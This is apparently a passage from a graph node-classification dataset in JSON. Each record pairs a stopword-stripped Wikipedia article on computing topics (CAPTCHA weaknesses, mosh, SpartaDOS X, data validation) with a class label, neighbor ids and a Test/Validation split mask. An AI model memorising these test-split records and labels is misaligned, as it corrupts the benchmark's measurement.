august 2014 usenix woot conference bursztein et al presented first generic captcha-solving algorithm based reinforcement learning demonstrated efficiency many popular captcha schemas concluded text distortion based captchas schemes considered insecure moving forward october 2018 acm ccs'18 conference ye et al presented deep learning-based attack could successfully solve 11 text captcha schemes used top-50 popular website 2018 high success rate work shows effective captcha solver trained using 500 real captchas showing possible quickly launch attack new text captcha scheme possible subvert captchas relaying sweatshop human operators employed decode captchas 2005 paper w3c working group stated operator could easily verify hundreds hour 2010 university california san diego conducted large scale study captcha farms found retail price solving one million captchas low 1,000 another technique used consists using script re-post target site captcha captcha site owned attacker unsuspecting humans visit correctly solve within short script use however controversy around economic viability attack multiple internet companies like 2captcha deathbycaptcha offer human machine backed captcha solving services low 0.50 usd per 1000 solved captchas services offer apis libraries enable users integrate captcha circumvention tools captchas designed block first place howard yeend identified two implementation issues poorly designed captcha systems sometimes part software generating captcha client-side validation done server text user required identify rendered client side users modify client display un-rendered text captcha systems use md5 hashes stored client-side may leave captcha vulnerable brute-force attack notable attacks various captchas schemas include demonstration text distortion based captchas vulnerable machine learning based attacks researchers proposed alternatives including image recognition captchas require users identify simple objects images presented argument favor schemes tasks like object recognition typically complex perform text recognition therefore resilient machine learning based attacks notable alternative captcha schemas",
    "neighbors": [
      6916,
      7556,
      8204,
      535,
      4272,
      5424,
      1970,
      5048,
      5433,
      957,
      2238,
      6975,
      10173,
      10557,
      7370,
      331,
      6220,
      2527,
      7520,
      5857,
      1001,
      6762,
      3964,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 520,
    "label": 5,
    "text": "MPX_filter:mpx filter mpx filter function found cassette decks fm stereo broadcasts contain pilot tone 19 khz stereo information available higher frequencies system developed jointly zenith general electric normal monaural audio pilot tone serves phase reference decoding stereophonic information double sideband stereophonic difference information mixed broadcast together process encoding difference signal 23-53khz band via double-sideband carrier-suppressed amplitude modulation instance multiplexing residual high-frequency components signal remaining de-multiplexing problematic recording analog magnetic media higher frequencies unlikely survive filtering recording deck 19 khz tone within 20 20,000 hz frequency range many tape formats including compact cassette typically provides audible beat difference tone conjunction tape head bias signal used recording recording may also saturated pilot tone importantly pilot tone interferes proper functioning noise reduction systems dolby b c s. pilot tone relatively loud comparison overall loudness fm program typically -20db source signal correctly processed noise reduction system leading audible artefacts breathing pumping reason many decks defeatable mpx filters designed way mpx filter enabled also noise reduction system enabled mpx filter tape deck least notch filter block 19 khz pilot tone possibly higher frequencies 23-53khz 63-75khz bands difference heard recording fm stereo source engaging disengaging mpx filter switch three-head deck monitoring heard recording filter engaged recording sources compact disc setting switch effect playback decks mpx filter switch typically non-defeatable mpx filter incorporated design limits overall i.e record playback frequency response 15-16 khz",
    "neighbors": [
      2994
    ],
    "mask": "Validation"
  },
  {
    "node_id": 521,
    "label": 5,
    "text": "Mosh_(software):mosh software computing mosh mobile shell tool used connect client computer server internet run remote terminal mosh similar ssh additional features meant improve usability mobile users major features main drawbacks mosh additional prerequisites server lacks special features ssh connection forwarding lack native windows client mosh works different layer ssh whereas ssh transmits stream bytes direction server client client server using tcp mosh runs terminal emulator server figure screen server transmits screen client varying frame rate depending speed network allows mosh save network traffic slow intermittent connections mosh available linux distributions macos freebsd netbsd openbsd android solaris cygwin chrome app ios program termius includes independent implementation mosh protocol mosh built state-synchronization protocol ssp supports single-packet roaming client switched new ip address single packet successfully reaches server enough roam connection client need know roamed client may using nat nat roamed instead mosh research paper creators tested ssp link 29 packet loss found ssp reduced average response time factor 50 16.8 seconds 0.33 seconds compared ssh uses tcp different study students stanford university found ssp reduced average response time factor 30 5.9 seconds 0.19 seconds according mosh developers program found able predict immediately display 70 user keystrokes reducing median response time keystroke less 5 milliseconds masking latency network different study students stanford university found mosh able quickly echo 55 user keystrokes compared popular ssh mosh following drawbacks major drawback mosh requires server fulfill additional prerequisites needed ssh due design mosh needs server allow direct connections via udp servers fulfilling prerequisites used mosh examples systems include servers behind firewalls restrict connections ssh-port via tcp also problematic servers indirectly reachable latter usually accommodated ssh via 'proxycommand option supported mosh default server tries allocate first free udp port range 60001–60999 per connection dynamic port allocation considered extra burden risk firewall maintenance significant part firewall-filtering happens connection tracking called stateful filtering based syn/ack flags tcp segments udp packets n't flags.mitigation mosh 1.2.5 support non-roaming ipv6 connections use -6 option necessary exists experimental multipath capable version mosh supports ipv6 dynamically switching ipv4 ipv6 scrollback supported current release mosh using terminal emulator scrollbars disappear planned 1.3 release functionality trade-off garbage cleaning binary output wiped away one way mitigate currently using mosh combination terminal multiplexer like screen tmux ssh-agent forwarding currently supported x11 forwarding yet supported",
    "neighbors": [
      515,
      6403,
      9733,
      9735,
      3976,
      6797,
      4750,
      5397,
      2198,
      11413,
      6812,
      7847,
      10924,
      4398,
      7983,
      10417,
      1336,
      7356,
      965,
      2118,
      2245,
      8522,
      3659,
      6993,
      9946,
      6364,
      7519,
      5472,
      10341,
      6120,
      4850,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 522,
    "label": 4,
    "text": "Data_validation:data validation computer science data validation process ensuring data undergone data cleansing ensure data quality correct useful uses routines often called validation rules validation constraints check routines check correctness meaningfulness security data input system rules may implemented automated facilities data dictionary inclusion explicit application program validation logic data validation intended provide certain well-defined guarantees fitness accuracy consistency various kinds user input application automated system data validation rules defined designed using various methodologies deployed various contexts data validation rules may defined designed deployed example definition design contexts depts business applications data validation defined declarative data integrity rules procedure-based business rules data conform rules negatively affect business process execution therefore data validation start business process definition set business rules within process rules collected requirements capture exercise evaluating basics data validation generalizations made regarding different types validation according scope complexity purpose various validation operations carried example data type validation customarily carried one simple data fields simplest kind data type validation verifies individual characters provided user input consistent expected characters one known primitive data types defined programming language data storage retrieval mechanism well specification following primitive data types 1 integer 2 float decimal 3 string example many database systems allow specification following lcodice_1 codice_2 plus minus parentheses sophisticated data validation routine would check see user entered valid country code i.e. number digits entered matched convention country area specified validation process involves two distinct steps validation check b post-check action check step uses one computational rules see section determine data valid post-validation action sends feedback help enforce validation simple range constraint validation may examine user input consistency minimum/maximum range consistency test evaluating sequence characters one tests regular expressions example us phone number 10 digits letters special characters code cross-reference validation includes tests data type validation combined one operations verify user-supplied data consistent one external rules requirements validity constraints relevant particular organization context set underlying assumptions additional validity constraints may involve cross-referencing supplied data known look-up table directory information service ldap example experienced user may enter well-formed string matches specification valid e-mail address defined rfc 5322 well-formed string might actually correspond resolvable domain connected active e-mail account structured validation allows combination various basic data type validation steps along complex processing complex processing may include testing conditional constraints entire complex data object set process operations within system validation rule criterion constraint used process data validation carried data encoded onto input medium involves data vet validation program distinct formal verification operation program determined intended meets purpose validation rule check system still used many major software manufacturers designed employee microsoft sometime 1997 1999 method check data follows appropriate parameters defined systems analyst judgement whether data valid made possible validation program ensure complete accuracy achieved use clerical computer controls built system design stage difference data validity accuracy illustrated trivial example company established personnel file record contains field job grade permitted values b c d. entry record may valid accepted system one characters may correct grade individual worker concerned whether grade correct established clerical checks reference files systems design therefore data definitions established place limits constitutes valid data using data definitions range software validation checks carried consistency check ensures entered data logical example delivery date order date example validation check procedure used verify isbn failures omissions data validation lead data corruption soasp/html/ch10.html chapter10 data validation /ref data validation checks data fit purpose valid sensible reasonable secure processed category data security category data quality",
    "neighbors": [
      2818,
      5636,
      3462,
      1161,
      1803,
      8085,
      5530,
      5403,
      3880,
      5549,
      1841,
      2367,
      8640,
      8644,
      11589,
      2758,
      8262,
      9293,
      9561,
      7523,
      8677,
      6131,
      8825
    ],
    "mask": "Test"
  },
  {
    "node_id": 523,
    "label": 9,
    "text": "List_of_constructed_languages:list constructed languages following list notable constructed languages divided auxiliary ritual engineered artistic including fictional languages respective subgenres entries list information separate wikipedia articles international auxiliary languages languages constructed provide communication among human beings significant portion without necessarily replacing native languages controlled natural languages natural languages altered make simpler easier use acceptable certain circumstances use people speak original language well following projects examples controlled english visual languages use symbols movements place spoken word constructed sign languages also fall category languages actual religious use communities congregations engineered languages devised test hypothesis fall three categories philosophical experimental logical engineered language may belong one categories languages mainly intended knowledge representation easier computers understand several well known knowledge query manipulation languages created extensive research projects represent query knowledge computers experimental languages developed observe hypotheses alternative linguistic interactions could led different modern languages following two examples created ill bethisad alternate history project",
    "neighbors": [
      11425,
      124,
      11529
    ],
    "mask": "Test"
  },
  {
    "node_id": 524,
    "label": 0,
    "text": "Manfred_Pinkal:manfred pinkal manfred pinkal born 24 august 1949 german computational linguist senior professor saarland university manfred pinkal studied linguistics philosophy german language literature computer science university bochum university stuttgart received ph.d. linguistics university stuttgart pinkal ’ work centered around representation processing natural-language meaning frameworks truth-conditional distributional semantics special focus vagueness ambiguity interaction meaning context since 1990 teaching professor computational linguistics saarland university co-founder principal investigator two collaborative research centers founding speaker international post-graduate college “ language technology cognitive systems ” german science foundation dfg since 2007 deputy director cluster excellence “ multi-modal computing interaction ” mmci pinkal first computational linguist win gottfried wilhelm leibniz prize member akademie der wissenschaften und der literatur mainz",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 525,
    "label": 1,
    "text": "BBC_Genome_Project:bbc genome project bbc genome project digitised searchable database programme listings initially based upon contents radio times first issue 1923 2009 tv listings post 2009 accessed via bbc programmes site bbc genome bbc first online searchable database april 2006 bbc gave public access infax bbc programme database time infax contained around 900,000 entries every programme ever broadcast ceased operation december 2007 front page website still available see via internet archive infax ceased message website said would incorporating information individual programme pages 2012 replaced database fabric internal use within bbc december 2012 bbc completed digitisation exercise scanning listings radio times bbc programmes 1923-2009 entire run 4,500 copies magazine identified around five million programmes involving 8.5 million actors presenters writers technical staff listings published advance include late changes cancellations reflected infax however include huge numbers early radio television broadcasts dj shows bbc radio 1 bbc radio 2 rarely kept officially listed infax also usually include repeats archived programmes prior 1976 bbc archives issues scanned high resolution producing tif images optical character recognition ocr used turn text page searchable text genome database bbc genome released public use 15 october 2014 aim project allow researchers able find information easier help bbc archives build picture exists currently missing archive corrections ocr errors changes advertised schedules crowdsourced 440,910 user generated edits accepted editorial review mid-december 2018 listing entry unique identifier may expressed url example first screening doctor http //genome.ch.bbc.co.uk/8f81c193ba224e84981f353cae480d49 broadcast programme may one identifier broadcast thus listed repeat occasions different regions digitised editions entire magazines including front covers prose articles advertisements non-listings content 1920s added march 2017 1930s december 2017 1940s december 2018",
    "neighbors": [
      4315
    ],
    "mask": "Test"
  },
  {
    "node_id": 526,
    "label": 7,
    "text": "3tera:3tera 3tera inc. founded 2004 developer system software utility computing cloud computing headquartered aliso viejo california acquired ca technologies 2010 3tera among pioneers cloud computing space launched applogic system february 2006 cloud computing set technologies business practices enable companies sizes build deploy monitor scale applications using resources accessed internet web 2.0 saas enterprise government users adopting cloud computing eliminates capital investment hardware facilities well reduces operations labor june 16 2014 ca technologies announced applogic end life june 30 2015 3tera flagship product applogic used numerous service providers foundation cloud computing offerings applogic turnkey system converts arrays servers virtualized resource pools users subscribe order power applications users define virtual machines also complex application infrastructure like firewalls vpns load balancers storage nothing browser service providers offer variety services based applogic including generally distinguishes 3tera model applogic made available service software license allows customers obtain service number providers move easily providers well operate in-house cloud computing services 3tera principal founder late vladimir miloushev prior acquisition management founders included barry x lynn chairman chief executive peter nickolov president chief technology officer bert armijo senior vice president product development eric tessler vice president engineering essy nickolova vice president marketing communications robbie vann-adibè vice president sales krasimira nikolova chief financial officer",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      8495,
      3121,
      7352,
      2496,
      4289,
      5956,
      1224,
      6856,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 527,
    "label": 7,
    "text": "South_African_wireless_community_networks:south african wireless community networks south african wireless community networks wireless networks allow members talk send messages share files play games independent commercial landline mobile telephone networks use wifi technology many wireless mesh networks wireless community network may connect public switched telephone network and/or internet various restrictions connectivity south africa wireless community networks particularly useful areas commercial telecommunications services unavailable unaffordable wireless user groups wugs south african cities build infrastructure applications well training members wireless technology skills therefore wugs provide fertile ground new technology applications may large social benefits informal communities rural areas south africa neighboring countries south africa best developed modern telephone system africa almost 110 combined fixed-line cellular telephones per 100 persons 5.1 million internet users network 99.9 digital fixed-line monopoly telkom sa listed company government largest shareholder expired licensing neotel south africa second national operator starting operations november 2007 neotel licensed provide entire range telecoms services exception full mobility neotel expanding network fast far concentrating urban areas south african mobile communications market growing fast country three cellular network operators vodacom mtn cell c 39-million subscribers nearly 80 population however although one million broadband subscribers mostly using adsl hsdpa bandwidth remains relatively limited expensive major cities cape town durban johannesburg pretoria launched public-private initiatives build broadband networks provide cheaper voice data services example city tshwane includes pretoria testing delivery broadband internet voice services new metro-wide fibre-optic network using wireless hot spots provide adsl access meantime high cost broadband access stimulated development wireless user groups wugs allowed sell internet connectivity since non-commercial community networks although non-profit operating license-exempt spectrums legal status clear october 2007 jawug requested clarification whether required radio frequency spectrum and/or ecns license activities telkom provides relatively poor voice internet service underdeveloped rural areas south africa although investigating ways improve service using wireless technology independent communications authority south africa licensed several small telecoms firms operate regional networks remote under-served areas country bokone telecoms polokwane amathole telecoms eastern cape experimenting wimax technology provide service however due relatively high costs low revenue potential initiatives moving slowly room innovative approaches currently voip voice internet protocol service allowed areas less five percent population access telephone wifi restricted use individuals organisations within confines premises argument low-cost free voip wifi would destroy incentive commercial network providers upgrade rural networks however several commentators consider policy counter-productive discussed later many wireless community networks deliberately ignore restrictions cities south africa one non-profit groups collaborating running wireless user groups descriptions sample given information derived web sites jawug located johannesburg largest city south africa jawug founded 2002 kieran murphy justin jonker ross clarke steven carter first wireless user group south africa starting experimental network four students quickly expanding much larger network interconnecting several separate wireless mesh networks jawug isp network used purely non-commercial educational purposes jawug regularly used experimental deployment new technologies currently four links interconnect jawug network ptawug wireless user group pretoria north johannesburg jawug ptawug work together closely jawug helped get ptawug ground jawug also gives technical assistance new wireless users groups like port elizabeth wireless users group pewug core team members manage routing highsite maintenance regular wugmeets held discuss network issues future plans jawug membership base approximately 300 locations constantly expanding pretoria wug founded 28 july 2007 ptawug constitution guarantees openness free participation equality members wireless user group ptawug exclusively funded donations community volunteers conduct highsite installation maintenance spare time ptawug 5th largest wireless network organization world 600 member connections 7 october 2009 avoid rental costs highsites privately owned properties mostly high areas good line sight surrounding areas network number towers highsites located tall buildings private residences strategic places pretoria wireless project another community based network city connected pretoria wug network 3 february 2008 cape town wireless user group around since 2005 small network friends since grown citywide network ctwug 1500 user sites around cape town spanning way houtbay stellenbosch helderberg ctwug non-profit organisation geared towards community based wireless networking focus promote use understanding wireless equipment order build citywide free wireless network building network forms social interactive community people interest expanding improving network donate time money equipment group ctwug runs many network enhancements including gametime system stops bulk traffic certain hours gaming high-priority network uses ctwug puts lot priority making sure network usable many applications uses possible monthly annual fees kind asked membership contributions completely voluntary ctwug maintains good vendor relationships ensure high quality equipment used supplied network links durban wireless community founded december 2004 group people interested 802.11 a/b/g wireless technology durban third populous city south africa first meeting january 2005 4 attendees group 200 people mailing list 15 live nodes network spanning bluff umbilo morningside town tollgate westville goals non-profit group free join open include educating public wireless technology learning technology durban wireless community close ties jawug potchefstroom community network non-profit grassroots effort members community provide broadband network members using inexpensive off-the-shelf wifi radio networking equipment network operates license-exempt 2.4 ghz frequency spectrum stellenbosch community network joint project stellenbosch university stellenbosch local municipality cape province south africa purpose provide community wireless access university municipality services network pilot phase operated open public network accessible anyone right equipment although city-based community networks typically run hobbyists may primarily interested experimenting technology avoiding high broadband charges playing internet games serve also test beds serious projects training grounds wireless network engineers may benefit projects poor rural informal communities communities wireless mesh networks may great medical educational economic value giving affordable telephone internet access coupled initiatives one laptop per child aim provide low-cost devices assuming regulator continues remove obstacles deploying wifi community networks meraka institute government-backed organization promote ict development wireless africa programme meraka institute researching ways develop sustainable information communications technology developing countries research follows two tracks peebles valley mesh project using wireless mesh networking low cost first mile solution connect people internet project testing rural community take ownership network trial community-run wug near kruger national park mpumalanga province project uses cantennas connect wireless mesh network small self-constructed antennas made locally available material connected low-cost wifi card plugged computer although sponsored meraka institute project members state illegal current laws another project uwc telehealth testing system remote rural part eastern cape south africa lets nurses doctors use wireless ip-based communication system conduct patient referrals request ambulance services order supplies project ran difficulties first voice internet protocol voip illegal south africa even uwc telehealth network regulator removed restriction still legislative obstacles providing internet access project directors challenging orange farm informal settlement 300,000 people south johannesburg people afford mobile phones afford use internet cafes however dabba telecommunications company providing affordable telephone service orange farm wireless mesh technology dabba installed several wireless routers relay signals internet connection local community centre anyone within range one routers make phone calls using wi-fi sip session initiation protocol telephone calls within network free dabba supports low-cost prepaid calls telephones networks however phones average 100 takes significant technical knowledge investment build network like model may work poorer rural communities dabba working shuttleworth foundation non-profit south african charitable organization village telco project develop affordable easy-to-install telephone system rural communities goal design system costing us 5000 get started small-scale local entrepreneur could afford would break even within six months project came concept mesh potato cheap device perhaps 60 per unit connect standard analog telephone wireless network also serves wireless mesh node relaying signals mesh potatoes central wireless internet connection dabba companies similar model provide advice wireless community network owners connectivity outside world technology tested several manufacturers showing interest building devices village telco concept may potential many countries outside south africa",
    "neighbors": [
      9098,
      9478,
      10271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 528,
    "label": 3,
    "text": "Keith_Diefendorff:keith diefendorff keith diefendorff computer architect veteran microprocessor industry diefendorff one persons led industry developing risc processors embedded systems superscalar high performance systems one main designers powerpc family processors keith diefendorff started texas instruments designing integrated circuits processors systems later diefendorff joined motorola chief architect second-generation implementation 88000 instruction set architecture 88110 88110 commercial success motorola shifted focus creating new risc architecture ibm diefendorff assigned chief architect powerpc work motorola diefendorrf moved nexgen director technical x86-strategy diefendorff joined amd nexgen acquired amd amd diefendorrf moved apple architect altivec media extensions developed powerpc processors used apple keith diefendorff working embedded processor space first embedded processor ip-core company arc international arc diefendorrf moved mips technologies diefendorrf also worked processor analyst editor chief 1998–2001 industry magazine microprocessor report",
    "neighbors": [
      4098,
      11333,
      8102,
      3431,
      10316,
      1005,
      3470,
      5358,
      6799,
      8048,
      499,
      8120,
      8700,
      6815
    ],
    "mask": "None"
  },
  {
    "node_id": 529,
    "label": 2,
    "text": "Nokia_N78:nokia n78 nokia n78 3g smartphone made nokia first introduced mobile world congress 11 february 2008 launched 26 may 2008 €350 taxes subsidies runs symbian 9.3 s60 3rd edition fp2 marketed cheaper nseries device inside compact light body phone compatible n-gage 2.0 mobile gaming service successor n73 design shares similarities n81 n82 n96 despite relatively low price nokia n78 still pack numerous standard nseries features a-gps hsdpa wi-fi touch-sensitive navi wheel like n81 first nokia among first overall along sony ericsson w980 feature fm transmitter keypad hidden idle mode lights key pressed however become popular like n73 later 2008 nokia n79 introduced nokia n78 also first nokia phone new extended guitar-based version nokia tune firmware version 20.149 dated 8 december 2008 became available generic non-branded n78 via over-the-air update facility january 2009 latest firmware version 21.002 released 18 february 2009 lightest update 214 kb downloaded file using fota many improvements made overall performance device upgrade also firmware version 30.011 available nokia software updater update released 8 may 2009 available fota",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      2449,
      10770,
      8083,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 530,
    "label": 7,
    "text": "Cloud-based_integration:cloud-based integration cloud-based integration form systems integration business delivered cloud computing service addresses data process service-oriented architecture soa application integration one marketing buzzword ipaas integration platform service suite cloud services enabling customers develop execute govern integration flows disparate applications cloud-based ipaas integration model customers drive development deployment integrations without installing managing hardware middleware ipaas allows businesses achieve integration without big investment skills licensed middleware software ipaas used regarded integration tool cloud-based software applications used mainly small mid-sized business meantime however hybrid type ipaas i.e hybrid-it ipaas connects cloud on-premises becoming increasingly popular additionally large enterprises explore ways integrating ipaas existing estate cloud integration basically created break data silos improve connectivity optimize business process cloud integration increased popularity usage software service solutions growing day day prior emergence cloud computing integration could categorized either internal business business b2b internal integration requirements serviced on-premises middleware platform typically utilized service bus manage exchange data systems b2b integration serviced edi gateways value-added network van advent saas applications created new kind demand met cloud-based integration since emergence many services also developed capability integrate legacy on-premises applications well function edi gateways following essential features proposed one marketing company emergence sector led new cloud-based business process management tools need build integration layers since separate service drivers growth include need integrate mobile app capabilities proliferating api publishing resources growth demand internet things functionalities 'things connect internet integration market variety players application designers systems integrators cloud vendor network service providers development service providers include dell boomi ibm sap oracle microsoft mulesoft greenbird azuqua tibco software",
    "neighbors": [
      4194,
      9252,
      8581,
      4107,
      4236,
      7149,
      9104,
      9137,
      467,
      54,
      5210,
      3323,
      382
    ],
    "mask": "Test"
  },
  {
    "node_id": 531,
    "label": 4,
    "text": "Administrative_domain:administrative domain administrative domain service provider holding security repository permitting easily authenticate authorize clients credentials particularly applies computer network security concept captured 'admindomain class glue information model administrative domain mainly used intranet environments may implemented collection hosts routers interconnecting network managed single administrative authority interoperation different administrative domains different security repositories different security software different security policies notoriously difficult therefore administrative domains wishing ad hoc interoperation full interoperability build federation",
    "neighbors": [
      2948,
      5956,
      6856,
      7368,
      4490,
      939,
      6286,
      7407,
      9488,
      8498,
      756,
      5433,
      2556,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 532,
    "label": 2,
    "text": "SpartaDOS_X:spartados x spartados x spartados 4.0 disk operating system atari 8-bit family computers closely resembles ms-dos developed sold icd inc. 1987-1993 many years later picked third-party community spartados x upgrade project still maintains software spartados x named predecessors spartados 1.0 2.0 3.0 also icd products enjoys good level backward compatibility older spartados software contrary thought considering name version number newer version spartados 3.0 completely new system written scratch spartados x 4.0 originally developed michael gustafson 1987-89 shipped 64k rom cartridges icd inc. version 4.21 cartridge contained additional cartridge slot possible plug-in another cartridge icd r-time 8 battery-backed clock language cartridge action mac/65 etc game cartridge use conjunction dos 1992 atari corp. dropped official support 8-bit computers icd shortly rights 8-bit icd inventory purchased november 1993 michael hohman officially fine tooned engineering fte released slightly updated version 4.22 5 november 1995 two three years disappeared together items rights owned ten years later development spartados x considered abandonware picked enthusiasts spartados x upgrade project resulted several unofficial revisions software incorporating many utilities written since 1992 cleaning many identified problems including numerous improvements published versions spartados x non-multitasking operating system intentionally modeled closely resembling ms-dos look feel consists kernel system library several types drivers shell called command.com number utility programs spartados x written 6502 machine language fits 128k file-oriented rom cartridge full support atari-type serial disk drives well parallel hard drives long conform atari standards i.e long use plug-and-play parallel bus interface pbi mechanism implemented rom os xl/xe computers ramdisks like four block-device drivers installed nonstandard hard disk interfaces like handled specialized drivers maximum number drives hard disk partitions connected time 15 version 4.40 9 earlier versions kernel allows open files directories read-only write-only write-append read-write modes also maintains environment variables programs may request files searched directories specified path variables also control settings dos well programs example format date time displayed choice european dd-mm-yy 24-hour clock american mm-dd-yy 12-hour clock thanks form virtual filesystem practically filesystem directly accessed appropriate filesystem driver exists loaded memory eight drivers installed time main filesystem driver fitting within less 4.5 kb search directories ffirst/fnext read/write files fread/fwrite retrieve change current position within file ftell/fseek retrieve file length fileleng delete files directories remove/rmdir rename files directories rename/rendir make directories mkdir change attributes files directories chmod change current directory chdir retrieve path current directory getcwd collect information disk getdfree make binary file bootable setboot also maintains queued buffer cache hold 16 sectors 8 kb time proprietary file system format called spartados fs unrelated compatible ms-dos fat offers full support subdirectories ms-dos-like attributes ahps archived hidden protected subdirectory modification date time stamps random access data within file sparse files file naming convention 8+3 scheme inherited cp/m normal atari directory structure hierarchical practical limits nesting directories directory contain 1423 entries files directories file system 16-bit drive contain 65,535 logical sectors sector 0 exist atari disks logical sector size 128 256 bytes earlier versions 128 256 512 bytes v. 4.40 makes maximum capacity 16 mb per partition earlier versions 32 mb v.4.40 4 gb per disk – making sector clusters 65,536 bytes per cluster – theoretically possible yet implemented system library contains binary loader supporting standard address-dependent atari binaries well spartados x address-independent relocatable binary files also facilitates tasks error handling parsing command line well managing memory file device resources etc library also contains menu-driven disk formatter invoked time dos command processor also within application program entire library occupies 24 kb cartridge three banks 8 kb switched necessary release memory spartados x default user interface command-line interpreter name one used ms-dos command.com spartados x command.com program less 4 kb includes roughly 45 internal commands dir cd del etc i/o redirection uses « » instead unix systems sign spartados native path separator pseudo-pipelines available spartados x version 4.42 batch files contain structured conditionals ... else ... fi goto gosub procedures loops environment variable comspec may point alternative command-line interpreter loaded instead command.com additional utility called runext allows associate data types programs invoked automatically user enters name data file dos prompt hits return key program called menu facilitates complex file management tasks serve replacement shell utilities allow change disk names search disks files undelete install keyboard buffer edit system files config.sys autoexec.bat port arc provides file compression facilities among dedicated programs directly available cartridge thus bundled dos disk editors available well utilities check repair filesystem consistency following commands supported spartados x startup text file called config.sys read boot disk contents file decides memory dos use keep bulk code drivers choice extended memory two areas conventional 64k many files opened time size buffer cache location memory choices dos code default environment variables drivers load apart main one 9 alternative configuration files 19 v.4.45 choice offered startup form menu config.sys file present default one loaded cartridge default file used configuration autoexec.bat batch file run command.com command.com loaded first time spartados x requires atari 8-bit 400 800 xl/xe models computer equipped least 48 kb conventional memory run 64 kb truly usable 48k machine little memory left execute programs recommended configuration though least 128 kb ram 64k conventional plus least 64k extended dos use extended memory keep large portion code buffer cache internal structures thus releasing conventional memory rest extended memory used additional drivers ramdisks unlike predecessor spartados 3.0 spartados x commonly referred dos atari 8-bit parlance atari 8-bit operating system consists two main parts rom-based os bootable dos common misconception division respective parts correspond bios dos ibm pc compatible machine reality os responsible communication block devices like pc bios also character devices including file-oriented ones like pc dos consequently file management functions centralized os -part dos -part one subordinated device drivers performs mass-storage media like floppy disk dos atari typically consists aforementioned device driver called fms file management system application program playing role os shell shell typically called dup disk utility package communication user programs including dup fms goes cio central input/output residing rom design shortcomings example typical dos able keep eight files opened time limit imposed api rom-based os spartados x even though registered rom-based cio device driver backward compatibility performs typical dos functions requested way fact independent cio instead i/o centre known kernel related rom-based os set specifiers drivers character devices like con com block devices spartados x programs perform i/o operations spartados kernel bypassing atari os rom completely thanks possible break many limitations e.g many 16 files opened time also makes spartados x unlike example predecessor spartados 3.2 dos atari operating system another device driver sort shell",
    "neighbors": [
      6289,
      6675,
      8729,
      7325,
      9762,
      7847,
      808,
      7983,
      4409,
      7356,
      8129,
      8262,
      9166,
      1750,
      7000,
      9946,
      6498,
      1515,
      5359,
      9840,
      6129,
      7281,
      2933,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 533,
    "label": 3,
    "text": "PC_System_Design_Guide:pc system design guide pc system design guide also known pc 97 pc 98 pc 99 pc 2001 specification series hardware design requirements recommendations ibm pc compatible personal computers compiled microsoft intel corporation 1997–2001 aimed helping manufacturers provide hardware made best use capabilities microsoft windows operating system simplify setup use computers every part standard computer common kinds peripheral devices defined specific requirements systems devices meet specification automatically recognized configured operating system four versions pc system design guide released within version distinction made requirements consumer pc office pc entertainment pc initial version aimed systems used windows 98 windows 2000 required published required strongly discouraged published final version first require io-apics enabled desktop systems places greatly increased emphasis legacy-reduced legacy-free systems legacy items isa expansion slots device dependence ms-dos forbidden entirely others merely strongly discouraged perhaps end-user visible lasting impact pc 99 introduced color code various standard types plugs connectors used pcs many connectors look similar particularly novice pc user made far easier people connect peripherals correct ports pc color code gradually adopted almost pc motherboard manufacturers color codes also widely adopted peripheral manufacturers pdf versions",
    "neighbors": [
      5377,
      6913,
      9057,
      10153,
      8266,
      1515,
      780,
      6797,
      10954,
      7983,
      6129,
      5368,
      8125,
      3294
    ],
    "mask": "None"
  },
  {
    "node_id": 534,
    "label": 6,
    "text": "Solid_(web_decentralization_project):solid web decentralization project solid social linked data web decentralization project led tim berners-lee inventor world wide web developed collaboratively massachusetts institute technology mit project aims radically change way web applications work today resulting true data ownership well improved privacy developing platform linked-data applications completely decentralized fully users control rather controlled entities ultimate goal solid allow users full control data including access control storage location end tim berners-lee formed company called inrupt help build commercial ecosystem fuel solid two decades berners-lee invented world wide web 1989 outlined design issues later became solid project drafts wrote world wide web consortium berners-lee became increasingly dismayed seeing invention abused russian hackers allegedly interfered 2016 us elections facebook–cambridge analytica data scandal became public facebook 2012 conducted psychological experiments nearly 700,000 users secret google amazon applied patents devices listen emotional changes human voices berners-lee felt internet need repair conceived solid project first step fix way give individual users full control usage data solid project available anyone join contribute although berners-lee advises people without coding skills instead advocate publicly changing internet 2015 mit received gift mastercard support development solid berners-lee research team collaborated qatar computing research institute oxford university solid 2018 berners-lee took sabbatical mit launch commercial venture based solid named inrupt company mission provide commercial energy ecosystem help protect integrity quality new web built solid number technical challenges surmounted accomplish decentralizing web according berners-lee vision rather using centralized spoke–hub distribution paradigm decentralized peer-to-peer networking implemented manner adds control performance features traditional peer-to-peer networks bittorrent goals system easy use fast allow simple creation applications developers solid central focus enable discovery sharing information way preserves privacy user stores personal data pods personal online data stores hosted wherever user desires applications authenticated solid allowed request data user given application permission user may distribute personal information among several pods example different pods might contain personal profile data contact information financial information health travel plans information user could join authenticated social-networking application giving permission access appropriate information specific pod user retains complete ownership control data user pods data pod contains pod stored applications permission use data detail solid consists following components",
    "neighbors": [
      3428,
      3462,
      9967,
      10452,
      53,
      119,
      124,
      3676
    ],
    "mask": "Test"
  },
  {
    "node_id": 535,
    "label": 4,
